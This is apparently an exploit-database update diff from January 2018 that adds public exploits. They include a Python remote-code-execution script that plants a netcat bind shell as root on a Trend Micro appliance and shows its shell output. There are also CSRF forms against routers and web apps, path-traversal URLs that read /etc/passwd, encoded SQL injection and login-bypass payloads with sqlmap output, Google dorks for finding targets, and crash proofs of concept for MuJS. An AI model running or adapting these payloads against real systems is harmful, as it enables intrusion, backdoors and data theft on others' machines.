DB: 2018-01-29

21 changes to exploits/shellcodes

Artifex MuJS 1.0.2 - Denial of Service
Artifex MuJS 1.0.2 - Integer Overflow

BMC BladeLogic 8.3.00.64 - Remote Command Execution
Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution
PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal
PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection
Gnew 2018.1 - Cross-Site Request Forgery
Nexpose < 6.4.66 - Cross-Site Request Forgery
Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
Task Rabbit Clone 1.0 - 'id' SQL Injection
TSiteBuilder 1.0 - SQL Injection
Hot Scripts Clone - 'subctid' SQL Injection
Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection
Buddy Zone 2.9.9 - SQL Injection
Netis WF2419 Router - Cross-Site Request Forgery
KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery

Linux/x86 - Egghunter Shellcode (12 Bytes)
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)

exploits/hardware/webapps/43919.html

@@ -0,0 +1,63 @@
+# Exploit Title: Netis-WF2419 Router Cross-Site Request Forgery (CSRF)
+# Date: 28/01/2018
+# Exploit Author: Sajibe Kanti
+# Author Contact: https://twitter.com/@sajibekantibd
+# Vendor Homepage: http://www.netis-systems.com/
+# Version: Netis-WF2419, V2.2.36123
+# Tested on: Windows 10
+#Technical Details & Description:
+
+A cross-site request forgery web vulnerability has been discovered in the
+official Netis-WF2419 Router.
+
+The vulnerability allows remote attackers to manipulate client-side
+web-application to browser requests to compromise the router
+by execution of system specific functions without session protection.
+
+A remote attacker is able to delete Address Reservation List settings of
+Netis Router with a cross-site request forgery html script code.
+
+The vulnerability can be exploited by loading embedded html code in a site
+or page. The issue can also be exploited by attackers to external redirect
+an user account
+to malicious web pages.
+ The issue requires medium user interaction in case of exploitation. The
+request method to execute is GET and the attack vector is located on the
+client-side of the router firmware.
+
+Exploitation of the cross site request forgery web vulnerability requires
+no privilege web application user account and medium or high user
+interaction.
+Successful exploitation results in client-side account theft by client-side
+phishing, client-side external redirects and non-persistent manipulation of
+application functions that are in use.
+
+The vulnerability can be exploited by remote attackers without privileged
+application user account and with medium or high user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+#Manual steps to reproduce the vulnerability :
+
+1. Logging Your Netis Router
+1. Now inject or use the html code
+2. When the user of the router opens the html code in site or other type of
+redirection. Router Address Reservation List will be erased!
+4. Successful reproduce of the cross site request forgery vulnerability!
+
+#PoC: Exploitcode :
+
+<html>
+  <body>
+    <form action="http://192.168.10.2/cgi-bin-igd/netcore_set.cgi"
+method="POST">
+      <input type="hidden" name="mode&#95;name" value="netcore&#95;set" />
+      <input type="hidden" name="reserve&#95;address&#95;set" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+Note: By loading this html code All Address Reservation List will be erased
+and the router becomes finally misconfigured!

exploits/linux/remote/43920.py

@@ -0,0 +1,263 @@
+#!/usr/local/bin/python
+"""
+Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability
+Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ 
+File: TDA_InstallationCD.2.6.1062r1.en_US.iso
+sha1: 8da4604c92a944ba8f7744641bce932df008f9f9
+Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1
+
+Summary:
+========
+
+The vulnerabity is that the dlp_policy_upload.cgi allows the upload of a zip file, located statically as: /var/dlp_policy.zip.
+The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations:
+
+- /eng_ptn_stores/prod/sensorSDK/data/
+- /eng_ptn_stores/prod/sensorSDK/backup_pol/
+
+We can then use symlinks to craft a symlinked that points to /opt/TrendMicro/MinorityReport/bin/
+
+ls -la /eng_ptn_stores/prod/sensorSDK/data/si
+lrwxrwxrwx    1 root     root           35 Sep  3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/
+
+Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed...
+
+Notes:
+======
+
+- For this particular PoC, all I did was exec a bind shell using netcat showing that there is no firewall protections...
+- Auth is bypassed in an alternate poc, so we can attack this with the default password...
+
+Exploitation
+============
+
+This is a clever trick, basically, we cant traverse since unzip checks for ../ (even though spec says its ok).
+We can still exploit this however by extracting a symlink to say a directory and then write into that directory.
+
+For example, if you wanted to link to /tmp you would
+
+ln -s /tmp/ pwn
+zip --symlinks -r foo.zip pwn 
+
+Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk.
+All we need todo now is create another zip file with the folder and file...
+
+zip -r foo.zip pwn/hax.txt
+
+Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python.
+
+So, in summary, the steps to attack this target are:
+
+1. Bypass the auth via XXXX
+2. upload a zip with a symlink 
+3. trigger extraction, crafting the malicious symlink
+4. upload another zip with the malicious dlp_kill.sh file
+5. trigger extraction, the symlink fires and crushs /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi
+
+Greetz to the busticati, you know who you are. My home boys.
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <pass>
+(+) eg: ./poc.py 172.16.175.123 admin
+saturn:~ mr_me$ ./poc.py 172.16.175.123 admin123
+(+) logged into the target...
+(+) performing initial preflight attack...!
+(+) uploading the zipped symlink...
+(+) successfuly uploaded the zipped symlink
+(+) extracting the symlink...
+(+) extracted the symlink!
+(+) uploading the zipped dlp_kill.sh...
+(+) successfuly uploaded the zipped log_cache.sh
+(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/...
+(+) extracted the dlp_kill.sh file!
+(+) starting backdoor...
+(+) backdoor started !
+(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !
+(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+id
+uid=0(root) gid=0(root)
+uname -a
+Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown
+cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+#!/bin/sh
+
+kill `pidof sensorworker sensormain`
+for i in `seq 0 4`;
+do
+    sleep 1;
+    sid=`pidof sensormain`
+    if [ "$sid" -eq "" ]; then
+        break
+    else
+        if [ $i -eq 4 ]; then
+            kill -9 $sid
+        fi
+    fi
+done
+`nc -e /bin/sh -lp 2122>/dev/null`
+sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+#!/bin/sh
+
+kill `pidof sensorworker sensormain`
+for i in `seq 0 4`;
+do
+    sleep 1;
+    sid=`pidof sensormain`
+    if [ "$sid" -eq "" ]; then
+        break
+    else
+        if [ $i -eq 4 ]; then
+            kill -9 $sid
+        fi
+    fi
+done
+exit
+
+Cleanup:
+========
+
+We just use "sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh" to remove the last line
+of the script (the backdoor).
+"""
+import os
+import sys
+import time
+import zipfile
+import requests
+import threading
+from cStringIO import StringIO
+
+requests.packages.urllib3.disable_warnings()
+
+def _get_bd():
+    bd = """#!/bin/sh
+
+kill `pidof sensorworker sensormain`
+for i in `seq 0 4`;
+do
+    sleep 1;
+    sid=`pidof sensormain`
+    if [ "$sid" -eq "" ]; then
+        break
+    else
+        if [ $i -eq 4 ]; then
+            kill -9 $sid
+        fi
+    fi
+done
+`%s>/dev/null`
+""" % c
+    return bd
+
+def _build_zip(CREATE_SYMLINK=False):
+    """
+    builds the zip file using a symlink attack into a folder...
+    so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory
+    and then crush the dlp_kill.sh only to then later get it executed
+    resulting in rce as root.
+    """
+    if CREATE_SYMLINK:
+        zipinfo = zipfile.ZipInfo()
+        zipinfo.filename = u'si'
+        zipinfo.external_attr |= 0120000 << 16L         # symlink file type
+        zipinfo.compress_type = zipfile.ZIP_STORED
+    f = StringIO()
+    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
+    if CREATE_SYMLINK:
+        z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")
+    else:
+        zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")
+        zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo
+
+        # backdooring code, as we do
+        z.writestr(zipinfo, _get_bd())
+    z.close()
+    test = open('hax.zip','wb')
+    test.write(f.getvalue())
+    test.close()
+    return f.getvalue()
+
+def we_can_upload_a_zip(CREATE_SYMLINK=False):
+    """
+    uploads a zip file with php code inside to our target for exploitation
+    """
+    multiple_files = {
+        'Q_UPLOAD_ID': (None, ''),
+        'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),
+        'submit': (None, 'Import')   
+    }
+    r = s.post(upload_url, files=multiple_files, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def unzip():
+    try:
+        r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)
+    except:
+        pass
+    return True
+
+def we_can_login():
+    r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)
+    if "frame.cgi" in r.text:
+        return True
+    return False
+
+def main():
+    global c, s, t, p, login_url, unzip_url, upload_url
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <pass>" % sys.argv[0]
+        print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]
+        sys.exit(-1)
+    t = sys.argv[1]
+    p = sys.argv[2]
+    bu = "https://%s/" % t
+    login_url  = "%scgi-bin/logon.cgi" % bu
+    unzip_url  = "%scgi-bin/admin_dlp.cgi" % bu
+    upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu
+    s = requests.Session()
+
+    # 1st we bypass auth and login
+    if we_can_login():
+
+        # we just use a bind, demonstrating that the target doesnt even have a proper firewall!
+        c = "nc -e /bin/sh -lp 2122"
+        print "(+) logged into the target..."
+        print "(+) performing initial preflight attack...!"
+        print "(+) uploading the zipped symlink..."
+
+        # 2nd we upload symlink attack
+        if we_can_upload_a_zip(CREATE_SYMLINK=True):
+            print "(+) successfuly uploaded the zipped symlink"
+            print "(+) extracting the symlink..."
+
+            # 3rd we extract it
+            unzip()
+            print "(+) extracted the symlink!"
+            time.sleep(2)   # let the server process things
+            print "(+) uploading the zipped dlp_kill.sh..."
+
+            # 4th we upload the backdoor
+            if we_can_upload_a_zip(CREATE_SYMLINK=False):
+                print "(+) successfuly uploaded the zipped log_cache.sh"
+                print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."
+
+                # 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+                unzip()
+                print "(+) extracted the dlp_kill.sh file!"
+                print "(+) starting backdoor..."
+
+                # 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh
+                thread = threading.Thread(target=unzip, args=())
+                thread.daemon = True
+                thread.start()
+                print "(+) backdoor started !"
+                print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"
+                print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"
+                time.sleep(2)
+                os.system("nc %s 2122" % t)
+if __name__ == '__main__':
+    main()

exploits/multiple/dos/43903.txt

@@ -0,0 +1,36 @@
+Hello,
+
+I want to submit the following bug:
+
+The js_strtod function in jsdtoa.c in Artifex MuJS through 1.0.2 has an
+integer overflow because of incorrect exponent validation.
+
+# Exploit Title: Integer signedness error leading to Out-of-bounds read
+that causes crash
+# Date: 2018-01-24
+# Exploit Author: Andrea Sindoni - @invictus1306
+# Vendor: Artifex (https://www.artifex.com/)
+# Software Link: https://github.com/ccxvii/mujs
+# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
+# Tested on: Linux
+# CVE : CVE-2018-6191
+
+Content of the poc file
+$ cat poc.js
+function pipo() {var 2e2147483648= 117486231123842366;}
+
+Run it
+$ mujs poc.js
+
+Additional details about the bug:
+
+Inside the function js_strtod, after this line
+https://github.com/ccxvii/mujs/blob/81388eb40d29f10599ac30dde90e683a3c254375/jsdtoa.c#L714
+
+exp = -exp;
+
+the value of "exp" is still negative (cause integer declaration).
+
+Fixed in commit 25821e6d74fab5fcc200fe5e818362e03e114428 (
+http://git.ghostscript.com/?p=mujs.git;a=commit;h=25821e6d74fab5fcc200fe5e818362e03e114428
+)

exploits/multiple/dos/43904.txt

@@ -0,0 +1,16 @@
+# Exploit Title: DoS caused by the interactive call between two functions
+# Date: 2018-01-16
+# Exploit Author: Andrea Sindoni - @invictus1306
+# Vendor: Artifex (https://www.artifex.com/)
+# Software Link: https://github.com/ccxvii/mujs
+# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
+# Tested on: Linux
+# CVE : CVE-2018-5759
+
+Simple poc:
+# python -c "print 'func%d'*80000" > poc.js
+# mujs poc.js
+
+Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
+http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1
+)

exploits/multiple/webapps/43911.html

@@ -0,0 +1,75 @@
+# Exploit Title: [Cross Site Request Forgery at Nexpose Automated Actions]
+# Release Date: [2017-12-13]
+# Exploit Author: [Shwetabh Vishnoi]
+# Link: https://www.linkedin.com/in/shwetabhvishnoi
+# Vendor Homepage: [https://www.rapid7.com/]
+# Software Link: [https://www.rapid7.com/products/nexpose/download/]
+# Tested on: [Windows,Linux,Mac]
+# CVE : [CVE-2017-5264]
+# Solution: Update to 6.4.66
+# Affected Version(s): Rapid7 Nexpose 6.4.65
+Rapid7 Nexpose 6.4.13
+Rapid7 Nexpose 6.4.12
+Rapid7 Nexpose 5.8.6
+Rapid7 Nexpose 5.8
+Rapid7 Nexpose 5.7.5
+Rapid7 Nexpose 5.5.4
+Rapid7 Nexpose 5.5.3
+Rapid7 Nexpose 5.4.8
+Rapid7 Nexpose 5.4.7
+Rapid7 Nexpose 5.4.6
+Rapid7 Nexpose 5.5.8
+Rapid7 Nexpose 5.5.7
+Rapid7 Nexpose 5.5.6
+Rapid7 Nexpose 5.5.5
+Rapid7 Nexpose 5.5.1
+Rapid7 Nexpose 5.4.9
+Rapid7 Nexpose 5.4.5
+Rapid7 Nexpose 5.4.4
+Rapid7 Nexpose 5.4.3
+Rapid7 Nexpose 5.4.2
+Rapid7 Nexpose 5.4.12
+Rapid7 Nexpose 5.4.11
+Rapid7 Nexpose 5.4.10
+Rapid7 Nexpose 5.4.1
+Rapid7 Nexpose 5.4
+
+Description: Versions of Nexpose prior to 6.4.66 fail to adequately
+validate the source of HTTP requests intended for the Automated
+Actions administrative web application, and are susceptible to a
+cross-site
+request forgery (CSRF) attack.
+
+Affected URL/endpoint:
+https://nexpose-server.com/eso/conductor-service/api/workflows
+
+Proof Of Concept:
+
+<html>
+  <body>
+    <script>
+      function submitRequest()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST",
+"https:\/\/nexpose-server.com\/eso\/conductor-service\/api\/workflows\/",
+true);
+        xhr.setRequestHeader("Accept", "application\/json,
+text\/javascript, *\/*; q=0.01");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "application\/json");
+        xhr.withCredentials = true;
+        var body =
+"{\"name\":\"test2\",\"steps\":[{\"serviceName\":\"nexpose\",\"stepConfiguration\":{\"typeName\":\"discover-known-assets\",\"previousTypeName\":\"\",\"configurationParams\":{\"valueClass\":\"Object\",\"objectType\":\"siteMetadata\",\"properties\":{\"siteID\":{\"valueClass\":\"Array\",\"items\":[{\"valueClass\":\"Integer\",\"value\":67}]},\"VULN_CATEGORY\":{\"valueClass\":\"Array\",\"items\":[{\"valueClass\":\"Object\",\"objectType\":\"VULN_CATEGORY_ITEM\",\"properties\":{\"operator\":{\"valueClass\":\"String\",\"value\":\"CONTAINS\"},\"operand1\":{\"valueClass\":\"String\",\"value\":\"dos\"}}}]}}}}},{\"serviceName\":\"nexpose\",\"stepConfiguration\":{\"typeName\":\"tag\",\"previousTypeName\":\"discover-known-assets\",\"configurationParams\":{\"valueClass\":\"Object\",\"objectType\":\"tag\",\"properties\":{\"tagID\":{\"value\":339,\"valueClass\":\"Integer\",\"text\":\"Test\"}}}}}]}";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request"
+onclick="submitRequest();" />
+    </form>
+  </body>
+</html>

exploits/nodejs/webapps/43922.html

@@ -0,0 +1,29 @@
+# Exploit Title: Application wide CSRF Bypass
+# Date: Sep, 2017
+# Exploit Author: Saurabh Banawar
+# Vendor Homepage: http://keystonejs.com/
+# Software Link: https://github.com/keystonejs/keystone
+# Version: 4.0.0
+# Tested on: Windows 8.1
+# CVE : 2017-16570
+
+
+Link: https://vuldb.com/?id.109170
+
+
+Exploit:
+
+<html>
+ <body>
+ <form action="http://127.0.0.1:3000/keystone/api/users/create" method="POST"
+enctype="multipart/form-data">
+ <input type="hidden" name="name&#46;first" value="Saurabh" />
+ <input type="hidden" name="name&#46;last" value="Banawar" />
+ <input type="hidden" name="email"
+value="saurabh&#46;banawar&#64;securelayer7&#46;net" />
+ <input type="hidden" name="password" value="test" />
+ <input type="hidden" name="password&#95;confirm" value="test" />
+ <input type="submit" value="Submit request" />
+ </form>
+ </body>
+</html>

exploits/php/webapps/43907.txt

@@ -0,0 +1,32 @@
+# Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal / Local File Inclusion
+# Date: 08/14/2017
+# Software Link: http://www.pacsone.net/download.htm
+# Google Dork: inurl:pacs/login.php	inurl:pacsone/login.php		inurl:pacsone filetype:php home		inurl:pacsone filetype:php login
+# Version: PACSOne Server 6.6.2
+# Category: webapps
+# Tested on: Windows 7 / Debian Linux
+# Exploit Author: Carlos Avila
+# Contact: http://twitter.com/badboy_nt
+
+
+
+1. Description
+  
+DICOM Web Viewer is a component written in PHP that is part of PacsOne software. In version 6.6.2, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
+The 'path' parameter via GET is vulnerable.
+
+Found: 08/14/2017
+Vendor Reply & Fix: 09/28/2017
+
+  
+2. Proof of Concept
+
+
+http://localhost/pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
+
+http://localhost/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
+
+
+3. Solution:
+
+Application inputs must be validated correctly.

exploits/php/webapps/43908.txt

@@ -0,0 +1,57 @@
+# Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer SQL Injection
+# Date: 08/14/2017
+# Software Link: http://www.pacsone.net/download.htm
+# Version: PACSOne Server 6.6.2
+# Exploit Author: Carlos Avila
+# Google Dork: inurl:pacs/login.php	inurl:pacsone/login.php		inurl:pacsone filetype:php home		inurl:pacsone filetype:php login
+# Category: webapps
+# Tested on: Windows 7 / Debian Linux
+# Contact: http://twitter.com/badboy_nt
+
+1. Description
+  
+DICOM Web Viewer is a component written in PHP. In version 6.6.2, it is vulnerable to SQL Injection. This allows unauthenticated remote attacker to execute arbitrary SQL commands and obtain private information. Admin credentials aren't required.
+The 'username' and 'email' parameters via POST are vulnerable.
+
+Found: 08/14/2017
+Last Vendor Reply & Fix: 09/28/2017
+  
+2. Proof of Concept
+
+
+POST /pacs/userSignup.php HTTP/1.1
+Host: 192.168.6.105
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:54.0) Gecko/20100101 Firefox/54.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 206
+Referer: http://192.168.6.105/pacs/userSignup.php?hostname=localhost&database=dicom
+Cookie: PHPSESSID=k0ggg80jcl6m61nrmp12esvat2
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+hostname=localhost&database=dicom&username=test&password=22222222&firstname=test&lastname=test&email=test&action=Sign+Up
+
+
+root@kali18:~# sqlmap -r pacsone_local -v 2 -f -p email --dbms mysql –dbs
+
+web server operating system: Windows
+web application technology: Apache 2.4.23, PHP 5.6.25
+back-end DBMS: active fingerprint: MySQL >= 5.5.0
+               comment injection fingerprint: MySQL 5.7.14
+               html error message fingerprint: MySQL
+[20:09:33] [INFO] fetching database names
+[20:09:33] [INFO] the SQL query used returns 2 entries
+[20:09:33] [INFO] retrieved: information_schema
+[20:09:33] [INFO] retrieved: dicom
+[20:09:33] [DEBUG] performed 3 queries in 0.11 seconds
+available databases [2]:
+[*] dicom
+[*] information_schema
+
+
+3. Solution:
+
+Application inputs must be validated correctly.

exploits/php/webapps/43909.html

@@ -0,0 +1,49 @@
+# Exploit Title: Gnew 2018.1 - Cross-Site Request Forgery
+# Date: 26/01/2018
+# Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT
+# Vendor website : http://gnew.xyz/
+# Software download : http://www.gnew.xyz/pages/download.php
+# Version: 2018.1
+# Tested on: Windows 10 Home x64  / Kali Linux
+
+Product description :
+
+Gnew is a simple content management system (CMS) written in PHP and
+using a database server (MySQL, PostgreSQL or SQLite) for storage. It is
+fully customizable because it uses a system of templates and supports
+multiple languages
+
+Description :
+
+A vulnerability has been discovered in Gnew , which can be exploited by
+malicious people to conduct cross-site request forgery attacks.
+This can be used to get a privilege escalation on the targeted application.
+
+POC :
+
+------------------------------------ HTML--------------------------------------
+
+<form action="http://Target/gnew/admin/users.php " method="POST">
+ <input type="hidden" name="_method" value="POST"/>
+ <input type="hidden" name="user_name" value="test2"/>
+ <input type="hidden" name="user_level" value="4"/>
+ <input type="hidden" name="user_email" value="gnewtest@yopmail.com"/>
+ <input type="hidden" name="user_show_email" value="0"/>
+<input type="hidden" name="user_day" value="0"/>
+<input type="hidden" name="user_month" value="0"/>
+<input type="hidden" name="user_month" value="0"/>
+ <input type="hidden" name="user_language" value="english"/>
+ <input type="hidden" name="user_template" value="clean"/>
+ <input type="hidden" name="user_date_format" value="D,+M+jS+Y,+g:i+a"/>
+ <input type="hidden" name="user_date_offset" value="0"/>
+<input type="hidden" name="user_avatar" value=""/>
+ <input type="hidden" name="user_date_offset" value="0"/>
+ <input type="hidden" name="user_avatar"
+value="./../images/avatars/empty.png"/>
+ <input type="hidden" name="user_id" value="2"/>
+<input type="hidden" name="user_level_old" value="1"/>
+<input type="hidden" name="user_name_old" value="test2"/>
+<input type="hidden" name="edit_user" value="Éditer"/>
+<input type="submit" value="CSRF This"/></form>
+
+------------------------------------ HTML END--------------------------------------

exploits/php/webapps/43912.html

@@ -0,0 +1,47 @@
+<!--
+# # # # #
+# Exploit Title: Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: http://www.joomsky.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/js-support-ticket/
+# Software Download: http://joomsky.com/46/download/1.html
+# Version: 1.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6007
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability implication allows an attacker to inject html code, edit ticket etc..
+# 
+# Proof of Concept: 
+-->
+
+<html>
+<body>
+ 
+<form action="http://localhost/[PATH]/index.php" method="POST" enctype="multipart/form-data" name="adminForm" id="adminForm">
+<textarea name="message" id="message" cols="60" rows="20" style="width: 550px; height: 300px;">
+<p>[CODE]</p>
+</textarea><br>
+<input type="submit" class="button" name="submit_app" id="submit_app_button" onclick="return validate_form(document.adminForm)" value="Ver Ayari">
+<input type="hidden" name="id" id="id" value="1" />
+<input type="hidden" name="isoverdue" id="isoverdue" value="0" />
+<input type="hidden" name="ticketid" id="ticketid" value="vCP4VTWrwzY" />
+<input type="hidden" name="c" id="c" value="ticket" />
+<input type="hidden" name="task" id="task" value="saveticket" />
+<input type="hidden" name="uid" id="uid" value="521" />
+<input type="hidden" name="view" id="view" value="ticket" />
+<input type="hidden" name="layout" id="layout" value="formticket" />
+<input type="hidden" name="check" id="check" value="" />
+<input type="hidden" name="option" id="option" value="com_jssupportticket" />
+<input type="hidden" name="created" id="created" value="2018-01-27 11:46:58"/>
+<input type="hidden" name="update" id="update" value=""/>
+</form>
+
+</body>
+</html>

exploits/php/webapps/43913.txt

@@ -0,0 +1,24 @@
+# # # # #
+# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: https://joomlatag.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
+# Version: 5.3.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6008
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker download arbitrary file....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE]
+# 
+# # # # #

exploits/php/webapps/43914.txt

@@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Task Rabbit Clone 1.0 - SQL Injection
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: http://migrateshop.com/
+# Software Link: http://migrateshop.com/product/task-rabbit-clone-php-script/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/pages/single_blog.php?id=[SQL]
+# 
+# %31%20%20%2f%2a%21%31%33%33%33%37%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%33%33%33%37%53%45%4c%45%43%54%2a%2f%20%31%2c%76%65%72%73%69%6f%6e%28%29%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
+# 
+# # # # #

exploits/php/webapps/43915.txt

@@ -0,0 +1,37 @@
+# # # # # 
+# Exploit Title: TSiteBuilder 1.0 - SQL Injection
+# Dork: N/A
+# Date: 27.01.2018
+# Vendor Homepage: http://www.datacomponents.net/
+# Software Link: http://www.datacomponents.net/products/website/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php
+# 
+# User: ' OR 1 -- - Pass: anything
+# 
+# 2)
+# http://localhost/[PATH]/site.php?id=[SQL]
+# 
+# %2d%33%36%34%27%20%20%2f%2a%21%30%38%38%38%38%55%4e%49%4f%4e%2a%2f%28%2f%2a%21%30%38%38%38%38%53%45%4c%45%43%54%2a%2f%20%30%78%33%30%37%38%33%32%33%38%33%33%33%31%33%32%33%39%2c%30%78%32%38%33%32%32%39%2c%2f%2a%21%30%38%38%38%38%43%4f%4e%43%41%54%5f%57%53%2a%2f%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%30%78%34%39%34%38%35%33%34%31%34%65%32%30%35%33%34%35%34%65%34%33%34%31%34%65%2c%28%2f%2a%21%30%38%38%38%38%53%65%6c%65%63%74%2a%2f%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%2f%2a%21%30%38%38%38%38%73%65%6c%65%63%74%2a%2f%20%63%6f%75%6e%74%28%2a%29%2f%2a%21%30%38%38%38%38%66%72%6f%6d%2a%2f%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%2f%2a%21%30%38%38%38%38%74%61%62%6c%65%5f%6e%61%6d%65%2a%2f%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%2f%2a%21%30%38%38%38%38%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2a%2f%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29%2c%30%78%33%30%37%38%33%32%33%38%33%33%33%36%33%32%33%39%2c%30%78%32%38%33%3